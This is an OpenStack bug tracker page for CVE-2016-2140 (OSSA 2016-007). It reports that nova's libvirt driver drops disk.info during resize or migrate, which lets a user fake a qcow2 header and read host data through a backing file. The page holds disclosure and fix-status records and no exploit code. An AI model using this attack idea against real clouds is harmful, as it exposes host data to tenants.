[OSSA 2016-007] Host data leak during resize/migrate for raw-backed instances (CVE-2016-2140)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Compute (nova) |
Fix Released
|
Critical
|
Lee Yarwood | ||
Kilo |
Fix Released
|
Critical
|
Lee Yarwood | ||
Liberty |
Fix Released
|
Critical
|
Lee Yarwood | ||
OpenStack Security Advisory |
Fix Released
|
Critical
|
Unassigned |
Bug Description
First, a caveat. This report is from code inspection only. I haven't attempted to replicate it, and I have no immediate plans to. It's possible it doesn't exist due to an interaction which isn't immediately obvious.
When resizing an instance using the libvirt driver, we run LibvirtDriver.
for info in disk_info:
# assume inst_base == dirname(
...
Note that this doesn't copy disk.info, because it's not a disk. I have actually confirmed this whilst investigating another bug.
The problem with this is that disk.info contains file format information, which means that when the instance starts up again, the format of all its disks are re-inspected. This is the bug. It means that a malicious user can write data to an ephemeral or root disk which fakes a qcow2 header, and on re-inspection it will be detected as qcow2 and data from a user-specified backing file will be served.
I am moderately confident that this is a real bug.
Unlike the previous file format bug I reported, though, this bug would be mitigated by the fact that the user would have to access the disk via libvirt/qemu. Assuming they haven't disabled SELinux (nobody does that, right?) this severely limits the data which can be accessed, possibly to the point that it isn't worth exploiting. I also believe it would only be exploitable on deployments using raw storage, which I believe isn't common.
Given that I don't think it's all that serious in practise, I'm not going to work on this immediately as I don't have the time. If it's still around when I'm less busy I'll pick it up.
CVE References
description: | updated |
Changed in ossa: | |
status: | New → Incomplete |
summary: |
Host data leak during resize/migrate for raw-backed instances + (CVE-2016-2140) |
Changed in ossa: | |
status: | Confirmed → In Progress |
Changed in ossa: | |
status: | In Progress → Fix Committed |
information type: | Private Security → Public |
summary: |
- Host data leak during resize/migrate for raw-backed instances - (CVE-2016-2140) + [OSSA 2016-007] Host data leak during resize/migrate for raw-backed + instances (CVE-2016-2140) |
description: | updated |
Changed in nova: | |
importance: | Undecided → Critical |
Changed in ossa: | |
status: | Fix Committed → Fix Released |
Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.
So IIRC, the user needs direct access to libvirt/qemu to overwrite the disk with fake qcow2 headers after the instance is migrated and before the disk is re-inspected ?